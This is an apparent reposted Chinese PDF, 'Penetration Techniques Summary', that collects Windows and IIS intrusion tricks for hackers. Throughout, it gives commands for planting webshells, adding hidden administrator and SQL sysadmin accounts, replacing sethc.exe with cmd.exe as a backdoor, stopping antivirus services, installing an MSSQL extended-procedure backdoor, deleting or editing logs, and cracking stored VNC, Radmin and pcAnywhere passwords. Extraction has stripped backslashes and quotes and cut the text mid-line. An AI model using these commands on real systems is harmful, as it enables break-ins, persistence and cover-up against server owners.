《渗透技巧总结.pdf》由会员分享,可在线阅读,更多相关《渗透技巧总结.pdf(5页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、本着共享之精神,方便各位黑阔童鞋,发表此文,希望抛砖引玉,童鞋们踊跃发言。使之更加完善,在交流中进步,形成良好的互动 旁站路径问题 1、读网站配置。2、用以下 VBS On Error Resume Next If(LCase(Right(WScript.Fullname,11)=”wscript.exe”)Then Msgbox Space(12)&“IIS Virtual Web Viewer”&Space(12)&Chr(13)&Space(9)&“Usage:Cscript vWeb.vbs”,4096,”Lilo”WScript.Quit End If Set ObjService=
2、GetObject(“IIS:/LocalHost/W3SVC”)For Each obj3w In objservice If IsNumeric(obj3w.Name)Then Set OService=GetObject(“IIS:/LocalHost/W3SVC/”&obj3w.Name)Set VDirObj=OService.GetObject(“IIsWebVirtualDir”,“ROOT”)If Err 0 Then WScript.Quit(1)WScript.Echo Chr(10)&“&OService.ServerComment&“For Each Binds In
3、OService.ServerBindings Web=“”&Replace(Binds,”:”,”“)&”WScript.Echo Replace(Split(Replace(Web,”“,”),”“)(2),”,”)Next WScript.Echo“Path :”&VDirObj.Path End If Next 复制代码 3、iis_spy 列举(注:需要支持 ASPX,反 IISSPY 的方法:将 activeds.dll,activeds.tlb 降权)4、得到目标站目录,不能直接跨的。通过echo X:目标目录X.asp 或者 copy 脚本文件 X:目标目录X.asp 像目标目
4、录写入 webshell。或者还可以试试 type命令.WordPress 的平台,爆绝对路径的方法是:url/wp-content/plugins/akismet/akismet.php url/wp-content/plugins/akismet/hello.php phpMyAdmin 暴路径办法:phpMyAdmin/libraries/select_lang.lib.php phpMyAdmin/darkblue_orange/layout.inc.php phpMyAdmin/index.php?lang=1 phpmyadmin/themes/darkblue_orange/la
5、yout.inc.php 网站可能目录(注:一般是虚拟主机类)data/htdocs.网站/网站/CMD 下操作 VPN 相关:netsh ras set user administrator permit#允许administrator 拨入该 VPN netsh ras set user administrator deny#禁止 administrator 拨入该 VPN netsh ras show user#查看哪些用户可以拨入 VPN netsh ras ip show config#查看 VPN 分配 IP 的方式 netsh ras ip set addrassign meth
6、od=pool#使用地址池的方式分配 IP netsh ras ip add range from=192.168.3.1 to=192.168.3.254#地址池的范围是从192.168.3.1 到 192.168.3.254 命令行下添加 SQL 用户的方法:需要有管理员权限,在命令下先建立一个c:test.qry 文件,内容如 下:exec master.dbo.sp_addlogin test,123 EXEC sp_addsrvrolemember test,sysadmin 然后在DOS 下执行:cmd.exe/c isql-E/U alma/P/i c:test.qry 另类的加
7、用户方法:在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下:js:var o=new ActiveXObject(“Shell.Users”);z=o.create(“test”);z.changePassword(“123456,”)z.setting(“AccountType”)=3;vbs:Set o=CreateObject(“Shell.Users”)Set z=o.create(“test”)z.changePassword“123456,”z.setting(“AccountType”)=3 cmd 访问控制权限控制(注:反 everyone 不可读,
8、工具-文件夹选项-使用简单的共享去掉即可)命令如下 cacls c:/e/t/g everyone:F#c 盘 everyone 权限 cacls“目录”/d everyone#everyone 不可读,包括 admin 以下配合 PR 更好 3389 相关 a、防火墙 TCP/IP 筛选.(关闭 net stop policyagent&net stop sharedaccess)b、内网环境(LCX)c、终端服务器超出了最大允许连接 XP 运行 mstsc/admin 2003 运行 mstsc/console 杀软关闭(把杀软所在的文件的所有权限去掉)处理变态诺顿企业版:net stop
9、“Symantec AntiVirus”/y net stop“Symantec AntiVirus Definition Watcher”/y net stop“Symantec Event Manager”/y net stop“System Event Notification”/y net stop“Symantec Settings Manager”/y 卖咖啡:net stop“McAfee McShield”5 次 SHIFT:copy%systemroot%system32sethc.exe%systemroot%system32dllcachesethc1.exe copy%
10、systemroot%system32cmd.exe%systemroot%system32dllcachesethc.exe/y copy%systemroot%system32cmd.exe%systemroot%system32sethc.exe/y 隐藏账号添加:1、net user admin$123456/add&net localgroup administrators admin$/add 2、导出注册表 SAM 下用户的两个键值 3、在用户管理界面里的 admin$删除,然后把备份的注册表导回去。4、利用 Hacker Defender 把相关用户注册表隐藏 MSSQL 扩展
11、后门:USE master;EXEC sp_addextendedproc xp_helpsystem,xp_helpsystem.dll;GRANT exec On xp_helpsystem TO public;日志处理 C:WINNTsystem32LogFilesMSFTPSVC1下有 ex011120.log/ex011121.log/ex011124.log 三个文件,直接删除 ex0111124.log 不成功,“原文件正在使用”当然可以直接删除ex011120.log/ex011121.log 用记事本打开 ex0111124.log,删除里面的一些内容后,保存,覆盖退出,成功
12、。当停止 msftpsvc 服务后可直接删除 ex011124.log MSSQL 查询分析器连接记录清除:MSSQL 2000 位于注册表如下:HKEY_CURRENT_USERSoftwareMicrosoftMicrosoft SQL Server80ToolsClientPrefServers 找到接接过的信息删除。MSSQL 2005 是在 C:Documents and SettingsApplication DataMicrosoftMicrosoft SQL Server90ToolsShellmru.dat 防 BT 系统拦截可使用远程下载 shell,也达到了隐藏自身的效果
13、,也可以做为超隐蔽的后门,神马的免杀 webshell,用服务器安全工具一扫通通挂掉了)VNC 提权方法:利用 shell 读取 vnc 保存在注册表中的密文,使用工具 VNC4X 破解 注册表位置:HKEY_LOCAL_MACHINESOFTWARERealVNCWinVNC4password Radmin 默认端口是 4899,HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersParameter/默认密码注册表位置 HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersPort/默认端口注册表位
14、置,然后用 HASH 版连接。如果我们拿到一台主机的 WEBSEHLL。通过查找发现其上安装有 PCANYWHERE 同时保存密码文件的目录是允许我们的 IUSER 权限访问,我们可以下载这个 CIF 文件到本地破解,再通过 PCANYWHERE 从本机登陆服务器。保存密码的 CIF 文件,不是位于 PCANYWHERE 的安装目录,而且位于安装PCANYWHERE 所安装盘 的Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 如果 PCANYWHERE 安装在 D:program文件下下,那么 PCANYWHE
15、RE 的密码文件就保存在 D:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere文件夹下。搜狗输入法的 PinyinUp.exe 是可读可写的直接替换即可 WinWebMail 目录下的 web 必须设置 everyone 权限可读可写,在开始程序里,找到 WinWebMail 快捷方式下下来,看路径,访问 路径web 传 shell,访问 shell后,权限是 system,放远控进启动项,等待下次重启。没有删 cmd 组建的直接加用户。7i24 的 web 目录 也是可写,权限为 administrator。1433 SA 点构建注入点。